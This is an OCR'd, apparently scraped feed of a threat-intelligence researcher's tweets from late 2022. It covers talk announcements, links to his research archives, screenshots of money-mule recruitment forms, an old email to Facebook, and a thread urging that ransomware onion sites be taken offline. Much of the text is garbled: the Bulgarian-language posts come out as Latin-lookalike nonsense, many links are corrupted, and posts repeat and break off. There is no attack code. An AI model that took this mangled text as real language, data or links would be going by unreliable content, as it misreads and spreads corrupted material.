@ron_miller Doing well over here. My RSS feed - https://t.co/3YYEAaB6UX 
https://t.co/MTv5WmuaEl 
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') Subscribe — 2591 


Dancho 
Danchev's Blog - 
Mind Streams of 
Information 
Security 
Knowledge 


In the overwhelming sea of 
information, access to timely, 
insightful and independent open- 
source intelligence (OSINT) 
analyses is crucial for maintaining 
the necessary situational 
awareness to stay on the top of 
emerging security threats. This 
blog covers trends and fads, 
tactics and strategies, intersecting 
with third-party research, 
speculations and real-time 
CYBERINT assessments, all 


19:03 


@cbotol Hello. Yes. | am. Several people already approached me. Are you interested 
in joining the project? Can you send a short introduction to 
dancho.danchev@hush.com and I'll send you the details? Regards. Dancho 


7 - Monday 


00:05 


YTpe cb TykK - https://t.co/oQGWQzqDFJ noxenaute mu ycnex! #security 
#cybercrime #malware #ThreatHunting #Threatintelligence CC: @JonathanAzaria 
@PavelGeorgiev20 https://t.co/vxdxSMee23 
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Johnathan Azaria Dancho Danchev 


04:32 


https://t.co/oQGWQzqDFJ #security #cybercrime #malware #ThreatHunting 
#Threatintelligence https://t.co/9c 7JUjbJ4H 
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CYBER SECURITY TALKS BULGARIA 


DDOS ATTACKS - BIGGER! STRONGER! AND MORE ELUSIVE! 


DANGHO DANCHEV 


EXPERT IN THE FIELD OF CYBERCRIME FIGHTING AND THREAT INTELLIGENCE 


TUESDAY NOVEMBER 8 | 19:00 EEST 


Al 
stanga @ 


SHARE TO PROTECT 


18:32 
#NewpProfilePic https://t.co/6GFbIWAHYV 
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18:43 


https://t.co/JTcqOaYOur https://t.co/teixjzlbe8 
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8 - Tuesday 


04:21 


OctasBat 4 yaca - https://t.co/oQGWQzqDF] noxenante mu ycnex! #security 
#cybercrime #malware #ThreatHunting #threatintelligence 
https://t.co/QPMMvrBWpz 
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CYBER SECURITY TALKS BULGARIA 


DDOS ATTACKS - BIGGER! STRONGER! AND MORE ELUSIVE! 


DANCHO DANCHEV 


EXPERT IN THE FIELD OF CYBERCRIME FIGHTING AND THREAT INTELLIGENCE 


TUESDAY NOVEMBER 8 | 19:00 EEST 


Al 
stanga @ 


SHARE TO PROTECT 


9 - Wednesday 


04:00 


Cb6utueto 6bewe cynep! OuakBauTe CHUMku U Bugeo! - https://t.co/oQGWQzqDF) 
https://t.co/ballHaol7h 


1080 


10 - Thursday 


03:07 


Outstanding. https://t.co/pcrF9YOIxC 
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11 - Friday 


10:20 
Happy Friday! Cheers! #ThreatHunting #ThreatIntelligence https://t.co/Pa6GnNDeNu 
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10:42 


Happy Friday! Cheers! - Part Two. https://t.co/ecczNIMNOh 
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12 - Saturday 


02:17 
https://t.co/JTcqOaYOur #ThreatHunting #threatintelligence https://t.co/7j2NchkdeO 
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02:18 
https://t.co/JTcqOaYOur #ThreatHunting #threatintelligence https://t.co/rfRXmAUkCa 


5.3 Understanding Intelligence Sources 

The availability of the longitudinal data (the IOCs collected over 
a span of 13 years) also enables us to investigate the qualities of 
the indicators produced by different sources and their timeliness 
against new threats, as reported below. 


Timeliness. Using the aforementioned attack clusters (see Tuble 7), 
we analyzed the distribution of the articles first reporting the at- 
tacks over different blogs, as shown in Figure 8b. We found that 10 
blogs were responsible for the first report of 60% the clusters (each 
cluster likely to be a campaign). For example, the blog Dancho 
Danchev first report 12 clusters, each time involving 45 IOCs on 
average, Which later also showed up on other blogs. 


10:11 
https://t.co/T 7RBnhMFDb 


13 - Sunday 


01:29 


Who wants to participate in a podcast recording with me or do you know someone 
who might be interested? Reply here or drop me a line at dancho.danchev@hush.com 
#security #cybercrime #malware #CybersecurityAwarenessMonth 
#cybersecuritytips #ThreatHunting https://t.co/TF5iDqyZ6c 
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11:14 


Who’s waiting for the Second Edition? https://t.co/qLxz4Gvp7X [PDF] #security 
#cybercrime #malware #ThreatHunting #threatintelligence #threatintel 
https://t.co/DFUYcY]qiT 
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11:22 


Qanuo Danyes - Ku6ep Pa3y3HaBaHe - BTopo U3gaHue - JIM4eH Memoap - Ayano 
Kuura - https://t.co/kjE9QOvQGc [PDF] - https://t.co/P9FAOWVQgX [MP3] OpurnHana 
Ha AHrunckyu TykK - https://t.co/qLxz4GuRip [PDF] NpuatHo 4uetere uv cnywane! 
No3gapasu. Danuo. https://t.co/fK9OCeKeyV 
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SmokeLoader Themed Malware Serving Campaign Spotted in the Wild - An Analysis 
https://t.co/5BzXoxx1pK 
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Massive Malware Serving Campaign Abuses Portmap A Web Based Port Forwarding 
Solution - An Analysis https://t.co/iEAAPQCTbU 
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16 - Wednesday 


00:57 
https://t.co/5LKjhayZKL 
*1 
08:40 
Data Mining and Visualizing My Old GMail Account - An Analysis 
https://t.co/KjobuG6mMKRA 
08:40 


Sample Photos from My Cyber Security Talks Bulgaria Presentation - An Analysis 
https://t.co/HSIFUggiAu 


19:13 
https://t.co/sElhv2blY1 [PDF] #ThreatHunting #Threatintel https://t.co/uYSbjvUemZ 
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https://t.co/NzsTDI5upD #ThreatHunting #Threatintel https://t.co/cOBhMVoaEl 
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https://t.co/xRgsfmqLlhZ #ThreatHunting #Threatintel https://t.co/722cYqxbko 
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https://t.co/BOQKpDTE4K - 562 pages - [PDF] #Threatintelligence 
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https://t.co/QRIXdzOFnP #ThreatHunting #Threatintelligence #threatintel 
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20 - Sunday 
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https://t.co/dROF8vtIRZ #security #cybercrime #malware #CyberSec 
#cybersecuritytips #Threatintel #threatintelligence https://t.co/McwXiTA2ps 


Disruptive 
Individuals 


| have a birthday tomorrow. Wish me luck. https://t.co/JTcqOaYgET Photo courtesy of 
my during my student years. Stay tuned! https://t.co/s4Jd6mdr3t 
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Anyone hiring? #Threatintel #ThreatHunting #threatreport 


21 %1 
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03:33 
Threema anyone? 
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26 - Saturday 


07:34 


Exposing the Conti Ransomware Gang - https://t.co/BOQKpDCB2K [PDF] - 562 Pages. 
Original post here - https://t.co/TYV2P3Hfugq Stay tuned! #security #cybercrime 
#malware #ThreatHunting #Threatintel https://t.co/wHOQSrAdbf 
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Q: How did you got involved in #OSINT? A: By reading this - https://t.co/tyuzORNYpG 
[PDF] Catch up! Catch up! Catch up! - https://t.co/JTcqObfRwr 
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My old Twitter account archive here - https://t.co/gNBVQr8HkH - Psst - "Lovely Horse" 
participant - https://t.co/Lxt3ZCnn04 #MyTwitterAnniversary https://t.co/YE4495s54a 
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02:34 


"Exposing the Conti Ransomware Gang - An OSINT Analysis" - 
https://t.co/BOQKpDCB2K [PDF] - 562 pages. Original post here - 
https://t.co/TYV2P3Hfuq Stay tuned! https://t.co/kBezWUBMsB 
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02:34 


"Exposing the Conti Ransomware Gang - An OSINT Analysis" - 
https://t.co/BOQKpDTE4K [PDF] - 562 pages. Original post here - 
https://t.co/TYV2P3p6gi Stay tuned! https://t.co/LONgjbx5sf 
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"Exposing the Conti Ransomware Gang - An OSINT Analysis" - 
https://t.co/BOQKpDTE4K [PDF] - 562 pages. Original post here - 
https://t.co/TYV2P3p6gi Stay tuned! https://t.co/330UkOXipB 
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05:19 


lran hackers study - Part 01 - https://t.co/zg7gV6K5Q1 [RAR] - Iran hackers study - 
Part 02 - https://t.co/6OaWfY46G] [RAR] Enjoy! #ThreatIntelligence #threatintel 
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Ta3u cmamua ce cmpemu ga pas2nega npofvema 
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Iran hackers study - Part O01 - https://t.co/zg7gV6K5Q1 [RAR] - Iran hackers study - 
Part 02 - https://t.co/6OaWfY46G} [RAR] Enjoy! #Threatintelligence #threatintel 
https://t.co/RETqxFogkz 
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05:35 


Exposing Bulgaria - Who Stole the PC and Build a Fake Pro-Western Empire? - Part 01 - 
https://t.co/YEOWIAtXjT - Part 02 - https://t.co/c9XGjM3iaO Enjoy! 
https://t.co/p7j9bQF8f 
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05:54 


Second Edition of my "Cyber Intelligence" Memoir - https://t.co/qLxz4GuRip [PDF] in 
Bulgarian - https://t.co/kjE9QOvQGc [PDF] scheduled for digital release in January, 
2023. Stay tuned and Happy Holidays! #Threatintelligence #threatintel 
https://t.co/TywVfQyH9z 
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22:41 


Interested in helping me fund my research in a lifetime fashion where | can 
guarantee all the high-quality research and analysis on a daily basis? Check out my 
special Christmas Discount on Substack - https://t.co/r)JDQejLm5a enjoy! 
#ThreatHunting #threatintel https://t.co/lOaLPmZEuF 
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2 - Friday 


09:51 


Folks. Who wants to help me fund my research and let me dazzle you with the quality 
sophistication and relevance of my analysis? Just kidding here. Christmas Discount 
here - https://t.co/r/JDQejLm5a enjoy and stay tuned! #Threatintelligence 
#ThreatHunting https://t.co/XRq7TyLYcH 
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https://t.co/tQ6Dn1R2kU #security #cybercrime #malware #ThreatHunting 
#threatintelligence #threatreport #threatintel https://t.co/UddUMzcB1U 
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https://t.co/oQGWQzqDF] #security #cybercrime #malware #ThreatHunting 
#Threatintelligence #threatintel https://t.co/FWIHPJ1p31 
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https://t.co/YPwSbChWJ2 #security #cybercrime #malware #ThreatHunting 
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https://t.co/YPwSbCOTH2 #security #cybercrime #malware #ThreatHunting 
#threatintel https://t.co/wGt1QvzlZc 
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https://t.co/YPwSbChWJ2 #security #cybercrime #malware #ThreatHunting 
#threatintel https://t.co/VO0agk3)]Wq 
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17:51 


https://t.co/YPwSbCOTH2 #security #cybercrime #malware #ThreatHunting 
#threatintel https://t.co/mN3031PeiL 
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19:20 


Finally! I’ve managed to find the actual screenshot and I’ve decided to share it. Long 
story short this is what used to be state of the art botnet for launching spam 
Campaigns circa 2008 and I’ve actually managed to find a screenshot demonstrating 
it. Enjoy! https://t.co/mPtbc5FHva 
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19:24 
And this is how we went online once upon a time. https://t.co/wEkeuyays6 
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4 - Sunday 


05:20 


3gpaBente. HAKON Haema JU B Cbepata Ha KuNOep CUrypHOCT aHasIn3 Ha Kubep 
npectbnnenva vu threat intelligence BKNIOUNTeENHO aHasu3 Ha 3NO0HaMepeH KO Dark 
Web MOHUTOPUHE VU aHanu3 Ha KuOep CurypHoOcT u Kubep aTaku uv 3annaxu C 
ny6AMUYHU UZTOYHUWLN Ha UH*opmMayna? https://t.co/ICFNF25sSu 
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05:22 


BKNIOYUTeENHO NpOCNeAABaHeTO Ha KuNOep ataku UU BocTuraHe MO TexHUTe 
UZ3TOYHULM BKJIKOUUTESIHO U NPeNOpbKHU 3a TAXHATA PeaKLWA NPU TakuBa aTaku? 
Be3 recruiters a QUpeKTHO HaemMaHe 3a NO3ULMATA. UHTepecyBamM Ce OT TakKuBa 
no3vunu B Codbuas uv Mora ga 3ano4Ha BedHara. https://t.co/LITkw2Zb5t 
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Tyk - https://t.co/O4zpbxks]] MoxKe ga BuguTe Kone oT CV-to Mu “ NpegnowutamM Aa 

ce CBbpKeTe C MéH B LinkedIn unu Ha umMenn dancho.danchev@hush.com uv BedHara 

Lue BU OTTOBOPA 3a fla ce pa3z6epem 3a cnevABaluuTe CTbnku. Bnarogapsa. No3apasn. 
MaxHuo https://t.co/dCnJhn3rYb 


06:24 
Merry Christmas, everyone! Link: https://t.co/SJPh77aY3t Email: 


dancho.danchev@hush.com for the password! Happy hunting! Regards. Dancho 
#security #cybercrime #malware https://t.co/3LmMPwjLtRU 
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06:38 


Here’s the actual link - https://t.co/WcTneCjTqt #security #cybercrime #malware 
Happy holidays! Regards. Dancho https://t.co/R5ui9vNmFh 
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https://t.co/YPwSbChWJ2 https://t.co/GGeDbYHC28 
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https://t.co/YPwSbCOTHZ2 https://t.co/gO9iCasxcn 
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https://t.co/YPwSbChwWJ2 https://t.co/IsygzCQa27 
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11:34 
https://t.co/4aRqt9hn0E #ThreatHunting #threatintel 


11:36 
https://t.co/AmbQPOtAI3 #ThreatHunting #threatintel 


13:36 


Some high-res photos of my Keynote at CyberCamp 2016 on the topic of the 
Koobface Botnet - https://t.co/q5iTxLeLlir https://t.co/6IMjy2XDzU 
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Some high-res photos of my Keynote at CyberCamp 2016 on the topic of the 
Koobface Botnet - https://t.co/q5iTxLeLlr https://t.co/kOY6w9xjbG 
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13:43 
Money mule recruiters at their best - https://t.co/JTcqObfRwr https://t.co/IQ8UEZEif1 
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ABOUT US SERVICES CAREERS PARTNERS PRIVACY CONTACTS 


WE ARE RECRUITING \ 
PERFECT JOB \ ae 


FOR YOU 


NEWS ® 


@O i‘ vitay, ay tut, 2009 
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Money mule recruiters at their best - https://t.co/JTcqObfRwr https://t.co/gHRIPrgUuXxc 
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Why b Panama so attractive Our Services Careers 
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Money mule recruiters at their best - https://t.co/JTcqOaYOur https://t.co/xnsALX30vB 
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Western Union orders details > 


Employee details » 


Transfer type: Western Union 
First Name: 


Last Name: 


City: 

Country: 

Reference Number (MTCN)*: 908 .547 . 5754 ?) 
Western Union fee (USD)*: 600] 


First Name*: John 

Last Name*: Blackmore 
City*: New York 
Country*: United States 
Comments: 


Money mule recruiters at their best - https://t.co/JTcqObfRwr https://t.co/CCazgapVfE 
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13:44 
Money mule recruiters at their best - https://t.co/JTcqObfRwr https://t.co/VjcBpPVZey 
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Money mule recruiters at their best - https://t.co/JTcqObfRwr https://t.co/70LhrZMXC4 
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HammMenosanne 


Brnankn, dopmpl, tabanypt 
Application form (ENG) 
Application form electron. (ENG) 
Application form short (ENG) 
ConposoauTenbHaa dopma Ana oTNpaBneHusa MG (ENG) (ONE) 
ConposoautenbHaa dopma ana oTnpasneHna MG (ENG) (SPLIT) 
ConposoauTenbHaa dopma ana oTnpasnexnsa WU (ENG) (ONE) 
ConposoanTenbHaa dopma ans oTnpasneHna WU (ENG) (SPLIT) 
Espanol 
Formulario de Inscripcion (ESP) (.DOC) 
ConposoauTenbHaa dopma ans oTnpasneHna WU (ESP) (SPLIT) 
@opma ana BaHkoBcKMx AeTanel (ESP) (EEUU) 
®opma ana oTNpaBNeHHOro nepesoga WU (ESP) 
Italian 
Application form (ITAL) 
ConposoauTenbHas dopma ans oTnpasnexna WU (ITAL) 
®opma ans GaxkoscKux aeTanei (ITAL) (EU) 
@opma ana oTNpaBNeHHOro Nepesoga WU (ITAL) 
@opmbi ana GaHKoBCcKMx WeTanei 
Bank Details Form /IBAN/ (ENG) 
Bank Details Form /AU/ (ENG) 
Bank Details Form /CA/ (ENG) 
Bank Details Form /UK/ (ENG) 
Bank Details Form /US/ (ENG) 


https://t.co/JTcqObfRwr https://t.co/NIA2wgb9SE 
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13:51 
BakaSoftware - Exposed - https://t.co/nZcqdVfbzA https://t.co/n40SmNCkaS 
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13:51 
BakaSoftware - Exposed - https://t.co/nZcqdUX2Is https://t.co/kn63DLZ0Qs 


13:57 
Missing London? Stay tuned. https://t.co/OplQwftuZn 
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LONDON’S 24-26 
EARLS COURT f'4 443) 


WEBROOT 
STAND #G90 


Get an inside look at the latest cybercrime trends from one of 
today's most recognized threat intelligence experts. 


DANCHO 
DANCHEV 


Current & Emerging Trends Within the Cybercrime Ecosystem 


Follow @Webroot on Twitter for showtimes and details 


14:11 
Busted. https://t.co/JTIcqObfRwr https://t.co/wwWuutw1MG 
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Busted. https://t.co/JTcqOaYOur https://t.co/7ZelUZLP73 
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11:03:42) - Topic removed by xd! 


14:12 
Busted. https://t.co/JTcqObfRwr https://t.co/ndS70WwfZ6 
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Busted. https://t.co/JTcqObfRwr https://t.co/pfCVcig98B 
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State of the art. BGP over VPN - https://t.co/bYBreqejx! https://t.co/4NPkIBT7RI 
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State of the art. BGP over VPN - https://t.co/bYBreqejxl https://t.co/Qx2J8ai3g9 
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State of the art. BGP over VPN - https://t.co/bYBreqwsLt https://t.co/QsB2rvxv9] 
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The site is closed for redesign 


For support and connection, please call: (095)2734191, e-mail:support@ctlan.net. 


14:17 
DIY mobile malware on demand - https://t.co/JTcqObfRwr https://t.co/WMAWYtCrAl 
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DIY mobile malware on demand - https://t.co/JTcqOaYOur https://t.co/sOZrYijN3H 
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DIY mobile malware on demand - https://t.co/JTcqObfRwr https://t.co/qRLgq2gxzV 
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DIY mobile malware on demand - https://t.co/JTcqObfRwr https://t.co/Zmfbs4zFZu 
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https://t.co/YPwSbCOTH2 #security #cybercrime #malware #ThreatHunting 


#threatintel https://t.co/S2paxr5Tm7 
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04:11 
Any EU-based security conferences or events? 


04:15 
Grab the torrent! https://t.co/WcTneCJTqt https://t.co/20a7VTVMkR 
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09:30 
https://t.co/oM7m70KAc9 https://t.co/rQpCWc5X4D 


herdProtect 


12:58 


Who's into investing in VR? How about VR for hackers and security experts? Drop me 
a line at dancho.danchev@hush.com and I'll present the project. Meanwhile - here’s 
the project framework courtesy of me - https://t.co/a5DjewVqC4 Enjoy! 
#VirtualReality 


el 
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6 - Tuesday 
02:39 

https://t.co/7po8gJj94E #Threatintel #ThreatHunting #threatintelligence 
8 - Thursday 


09:05 


https://t.co/uvAt5gK9BA #security #cybercrime #malware #ThreatHunting 
#Threatintelligence #threatintel https://t.co/qzPW3UEhg8 


10:36 
https://t.co/e9uqgVWmsVL #ThreatHunting #threatintel 
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10 - Saturday 


13:24 


Do you want access to my collaborative Maltego graph which aims to be the world’s 
most in-depth and advanced database of hackers in the world? Check out the project 
front page - https://t.co/ZSNdyA3puE including the screenshots and ping me to 
request access. https://t.co/nMyTAqh1Ax 
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Do you want access to my collaborative Maltego graph which aims to be the world’s 
most in-depth and advanced database of hackers in the world? Check out the project 
front page - https://t.co/ZSNdyA3puE including the screenshots and ping me to 
request access. https://t.co/Ohu2XU6QL6 
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Do you want access to my collaborative Maltego graph which aims to be the world’s 
most in-depth and advanced database of hackers in the world? Check out the project 
front page - https://t.co/ZSNdyA3puE including the screenshots and ping me to 
request access. https://t.co/9wCNEDqbfh 
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11 - Sunday 


05:44 


https://t.co/K9UCG1BQjT #security #cybercrime #malware #Threatintel 
#ThreatHunting 
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07:59 


https://t.co/A75WA4Obf9 #Threatintel https://t.co/1SoeBJOwod 
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https://t.co/A75WA4Obf9 #ThreatIntel https://t.co/19JfRU7CE4 
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https://t.co/A75WA4Obf9 #Threatintel https://t.co/lyzjyOClfu 
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https://t.co/I7DhqZHIZi #security #cybercrime #malware #Threatintel 
#ThreatHunting 


11:53 


3OHpaBente. Ako yeTteTe 6nor-a mu - https://t.co/JTcqOaYOur uv Bu HOnaga mMoxe ga 
CBayuTe Ha BaLuNA TeENeCOH MOATA AHApONA annukauna VU Da nonyyaBate 
HOTUCbUKaLWN 3a HOBY CTaTUNM WIN fa ro YeTeTe ANpeKkTHO - https://t.co/uvAt5gKHrs 
Bnarogapa. No3gpasu. anuo. https://t.co/YYzW8ipfLh 
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12 - Monday 


04:02 
https://t.co/nNsXMPrGi0 https://t.co/XsLJ|QHZwK6 
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04:02 


04:02 


https://t.co/nNsXMPrGi0 https://t.co/Vm16WzmjuZ 
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04:03 
https://t.co/nNsXMPrGi0 https://t.co/JoVYCWT)jfd 


variety of OSINT 


anda 
gence research 


04:03 
https://t.co/nNsXMPrGi0 https://t.co/KOHNkIX5kF 
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09:10 


https://t.co/r7H58PsDbt #security #cybercrime #malware #ThreatHunting 
#Threatintel 


15 - Thursday 


03:14 


Who’s using Maltego and wants access to my collaborative hacker database Graph? 
Ping me here or drop me a line at dancho.danchev@hush.com and I'll shortly send 
you the necessary accounting data for the session. Regards. Dancho 
https://t.co/WvdyDzAOYP 
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Who’s using Maltego and wants access to my collaborative hacker database Graph? 
Ping me here or drop me a line at dancho.danchev@hush.com and I'll shortly send 
you the necessary accounting data for the session. Regards. Dancho 
https://t.co/wcvciMHj2w 
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03:14 


Who’s using Maltego and wants access to my collaborative hacker database Graph? 
Ping me here or drop me a line at dancho.danchev@hush.com and I'll shortly send 
you the necessary accounting data for the session. Regards. Dancho 
https://t.co/JNUEZBm5Nc 
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16 - Friday 


02:15 
Folks. What do you think would be the best way for me to retire? #security 


#cybercrime #malware #threathunting #threatintell #threatintel 


21 
09:54 
Grab the Torrent! - https://t.co/WcTneCjIAV #security #cybercrime #malware 
#ThreatHunting #Threatintelligence #threatintell #threatreport 
https://t.co/ETfl26i9nj 
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22 4 


09:59 


@th3cOrt3x 256GB. Enjoy! 


10:03 


@th3cOrt3x | can confirm. Just make sure to grab the torrent and | did my best to 
make it available online almost all the time. Regards. Dancho 


10:06 


@th3cOrt3x Great news. Keep me posted if you encounter any issues and keep in 
touch here if you need me for anything else. Regards. Dancho 


17 - Saturday 


01:39 
Happy holidays! https://t.co/yjN2bzqCgV 
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09:06 
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https://t.co/kyl5GvScSi https://t.co/ciyyrn7Egp 
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09:10 


https://t.co/JTcqOaYOur https://t.co/GlqdxCaAqw 
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09:11 


https://t.co/JTcqOaYOur https://t.co/VreurHZLuC 
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09:11 


https://t.co/JTcqOaYgET https://t.co/aUZzGFsEsR1 
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09:12 


https://t.co/JTcqObfRwr https://t.co/Twyq3SKeDV 
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09:13 


https://t.co/JTcqObfRwr https://t.co/zAn1xR357c 
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https://t.co/JTcqOaYOur https://t.co/340iN6gm3y 
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11:34 


https://t.co/JTcqOaYOur https://t.co/Dn6RRyH5RE 
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11:35 
https://t.co/JTcqOaYgET https://t.co/XovJGbm1Sa 
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11:35 


https://t.co/JTcqOaYgET https://t.co/qlTKuSO88r 
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11:35 


https://t.co/JTcqObfRwr https://t.co/oi8TAP4vc3 


1177 


11:36 


https://t.co/JTcqOaYgET https://t.co/7Y86paVh7m 
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11:36 


https://t.co/JTcqOaYgET https://t.co/LETX64NTyS 
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11:36 


https://t.co/JTcqObfRwr https://t.co/cgnLMz9pab 
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11:36 


https://t.co/JTIcqOaYgET https://t.co/deGfPpDgu5 
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11:37 
https://t.co/JTcqOaYgET https://t.co/vHIAW8kKHHL 
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ie 


https://t.co/JTcqOaYgET https://t.co/lI9eq4qldF) 
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11:37 


https://t.co/JTcqObfRwr https://t.co/aFvcXgKsnL 
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11:38 


https://t.co/JTcqOaYgET https://t.co/1VYdkObN8;j 
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11:38 


https://t.co/JTcqOaYgET https://t.co/hfaWcxXYKqC 
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11:38 


https://t.co/JTcqOaYgET https://t.co/2VJ6Kn4dCm 
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11:38 


https://t.co/JTcqObfRwr https://t.co/x6qqw8ADSs 
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11:38 


https://t.co/JTcqOaYOur https://t.co/ff4BjKz7Mq 
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11:39 


https://t.co/JTcqObfRwr https://t.co/N7nteTdhFG 
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11:39 


https://t.co/JTcqOaYOur https://t.co/yXm770IUbN 
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11:39 


https://t.co/JTcqObfRwr https://t.co/B1rVkV5dwF 
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11:40 


https://t.co/JTcqOaYOur https://t.co/o4HK3HWK8h 
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11:40 


https://t.co/JTcqOaYgET https://t.co/qdyeTaxbuP 
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11:40 


https://t.co/JTcqOaYOur https://t.co/CwRkYIH6X5 
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11:40 


https://t.co/JTcqOaYOur https://t.co/BYommOMX6b 
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11:41 


https://t.co/JTcqOaYOur https://t.co/PgQpePleyw 
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11:41 


https://t.co/JTcqOaYgET https://t.co/Cazu0OZ1P8 


1199 


11:41 


https://t.co/JTcqOaYOur https://t.co/YpvbaZatEd 


1200 


11:42 


https://t.co/JTcqObfRwr https://t.co/OVCAf1Lc6pT 
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11:42 


https://t.co/JTcqOaYOur https://t.co/isBikKnl1O1im 
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11:42 


https://t.co/JTcqOaYOur https://t.co/stoASwropE 
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11:42 


https://t.co/JTcqOaYOur https://t.co/FXyMAYe3Nc 
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11:42 


https://t.co/JTcqOaYgET https://t.co/ilw601Il2e 


1205 


11:43 


https://t.co/JTcqOaYgET https://t.co/TOrp4fw71u 
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7 whe tug 


11:43 
https://t.co/JTcqOaYgET https://t.co/xPLkIlcXu7Z 
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11:43 


https://t.co/JTcqOaYgET https://t.co/DnPJnhJm7B 
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11:43 


https://t.co/JTcqOaYgET https://t.co/ZiPxLOMig7 
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11:43 


https://t.co/JTcqOaYOur https://t.co/It5qrPXTQY 


1210 


11:44 


https://t.co/JTcqObfRwr https://t.co/LbBeljacvg 
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11:44 


https://t.co/JTcqOaYgET https://t.co/l2foen6jhx 
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18:27 


https://t.co/VwTtNTqJjO #security #cybercrime #malware #Threatintelligence 
#ThreatHunting #threatintell #threatintel 


18 - Sunday 


08:38 


https://t.co/VwItNTqJjO #security #cybercrime #malware #ThreatHunting 
#threatintell https://t.co/X1GJKwLjnb 
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08:39 


https://t.co/VwTtNTqJjO #security #cybercrime #malware #ThreatHunting 
#threatintell https://t.co/JuUEkyH7Ey6 


Tjanyo Janes e Ha 26 rOqHHH, MexKyHapOHO MpH3HaT ekchepT 
lo KHOepcurypHocT. Tol mule 3a clewuantH3sHpaHHa Onor Zero 
Day, 4acT OT HOBHHapcKaTa Mpexa Zdnet.com. IIpes centemBpu 
2010 r. JJanyo Jlanues H34e3Ba H OTTOaBa He OTTOBapA Ha CBOHTe 
KoopauHatu. TocneqHaTa My aKTHBHOCT B Twitter e OT OKTOMBDH. 
OT BLTpeIIHOTO MHHHCTepcTBO KOMeHTHpat, Ye JlaHyo JlaHyes 
qocera He e 61471 OOABABAH 3a H34e3HAI OT CBOUTe ONH3KH. 


08:39 


https://t.co/VwTtNTqJjO #security #cybercrime #malware #ThreatHunting 
1214 


#threatintell https://t.co/ouWYl1mpNR 


Hi Dancho. 


Are you alive? :) 
I just got this email. 


Best regards, 

Dmitry Bestuzhev 

Senior Regional Researcher, Latin America 
Global Research and Analysis Team 
Kaspersky Lab 

Key ID: 4096/0xE4D1B9CE 


http://www.kaspersky.com 
http://vwww.securelist.com 


08:40 


https://t.co/VwTtNTqJjO #security #cybercrime #malware #ThreatHunting 
#threatintell https://t.co/QNXcmKyYAra 


Hi folks, 


For some unknown reason -- all the malicious links published are 
always “spaced” etc. -- my personal blog http://ddanchev.blogspot.com 
is currently blacklisted by Facebook, and readers keep emailing me 
about it. As I'm sure you've been keeping track of all my 
Facebook-friendly, anti-Koobface oriented research+things I cannot 
disclose by blogging, I think the current situation is pretty awkward. 


The profiling of the malware campaigns taking place at Facebook, does 
not emphasize on Facebook's security practices, or the lack of such. 
Instead, it's hardcore campaign dissecting focusing on the attackers. 


I'd appreciate your comments, de-blacklisting of my personal blog in 
the best case. 


Regards 

Dancho Danchev 

Cyber Threats/CyberCrime Analyst | Security Blogger, ZDNet at CBS Interactive 
Personal Blog: http://ddanchev.blogspot.com 

ZDNet Blog: http://blogs.zdnet.com/security 

Twitter: http://twitter.com/danchodanchev 


Key ID: http://pgp.mit.edu:11371/pks/ lookup ?op=get&search=@xD36EEFI74EDGA7AD 
Fingerprint: @AF8 779A E727 4CA2 2525 7B@3 D36E EF97 4ED6 A7AD 


19 - Monday 


09:04 
https://t.co/3V2Fpb5HQu https://t.co/hG)jylVcn4 
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09:04 
https://t.co/3V2Fpb5HQu https://t.co/O9cY4CEAgT 


09:04 


https://t.co/3V2Fpb5HQu https://t.co/zHxBpUdqqV 
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sae @ 


09:18 


https://t.co/3V2Fpb6fG2 #security #cybercrime #malware #Threatintel 
#ThreatHunting #Threatintelligence #threatintell https://t.co/poGk35kIHnB 


20 - Tuesday 
02:02 


https://t.co/JNDSZX3591 https://t.co/perySaGwoD 
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02:03 
https://t.co/JINDSZX3591 https://t.co/JWBiHFBhsO 


02:03 


https://t.co/JINDSZX3591 https://t.co/bRUVGI7 X6f 
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03:15 


Today’s modern approach of fighting #ransomware consisting of having "Dmitry is it 
you on the other side of the line?" "Confirmed. Are we gathering later today"? direct 
conversation with a cybercriminal approach should be abandoned. 


*1 
03:16 


Directly engaging with the bad guys by having what should be considered surreal a 
conversation with them directly violates their OPSEC and is a good example of bad 
taste. 


03:19 


In terms of ransomware what do we got here? A Dark Web Onion which could be 
either shut down compromised or basically put under pressure from legitimate traffic 
trying to slow them down a free email service provider on behalf of an affiliate 
participant. 


*1 
03:20 
Figuring out surreal ways to fight ransomware should be considered a bad approach. 


Instead attempt to take down the infrastructure behind the campaign including to 
attempt to take offline the infrastructure of the affiliate network participant. 


03:23 


Personal observations here include the massive use of Protonmail and Tutanota email 
address accounts by ransomware affiliate network participants including old 
fashioned Dark Web Onion custom or basic WordPress installations which should be 
taken offline. 


1219 


03:25 


This is a Surreal case where a central location for a revenue soliciting location is 
known and what you've got there is ordes of affected victim’s including vendors 
trying to visit it where in reality what should be done is to attempt to take it offline. 


03:29 


In terms of taking the ransomware Dark Web Onions offline here’s a pretty good and 
decent three post series on some of the currently active ransomware Dark Web 
Onions - https://t.co/e9QuqVWIV6d 


23 - Friday 


09:49 


Merry Christmas to all of my friends and colleagues especially everyone who’s been 
working with me as an independent contractor throughout 2022. | wanted to let 
everyone know that the Second Edition of my memoir is schedule for March, 2023. 
Stay tuned! https://t.co/k4fgk3kNL4 
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25 - Sunday 


02:47 
Happy holidays, everyone! https://t.co/opAQ7exuux 


*1 
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17:55 


@HeapRtl Hello. Can you send me an email at dancho.danchev@hush.com and I'll 
then shortly send you the actual torrent file? Thanks a lot for the interest. Regards. 


Dancho 

1 

18:16 

@HeapRtl Hello. Here’s the actual download link - https://t.co/4dv6RcPYYA Regards. 

Dancho 

1 

26 - Monday 

08:09 


Grab a direct 256GB torrent download consisting of all of my publicly accessible 
research. Happy holidays! Direct download working link - https://t.co/a2y8HMBaq8y 
Enjoy and see you in 2023! Regards. Dancho #security #cybercrime #malware 
#Threatintelligence https://t.co/b3rmllZdJg 


21 *%2 
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28 - Wednesday 


17:50 
Dear @Cryptome_org | just sent you an email. | hope that we can soon feature both 
publications. Regards. Dancho 


31 - Saturday 


01:54 


https://t.co/gTZ1bJEDvm [PDF] #security #cybercrime #malware #Threatintelligence 
#ThreatHunting #Threatintel #threatintell #threatreport https://t.co/7WnzxfUcKM 


ei 
192 631 720 613 
ca 
@@| [wx lee 
. YVvV¥¥ 
- set 
10:38 


Upcoming 2023 celebration! Heading to another location! Stay tuned and happy 
celebration of 2023! See you in 2023. Regards. Dancho P.S | sincerely hope that my 


1223 


mother won’t come across this video. Although it’s the holidays. Stay tuned and see 
you in 2023! https://t.co/AYVizdzh7a 


12:27 


Stay tuned! Happy New Year 2023 celebration! Regards. Dancho #security 
#cybercrime #malware #ThreatHunting #Threatintelligence https://t.co/YXnLZeDCX| 


*1 
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Thee Definite OSINT and Actionable Threat Intelligence 
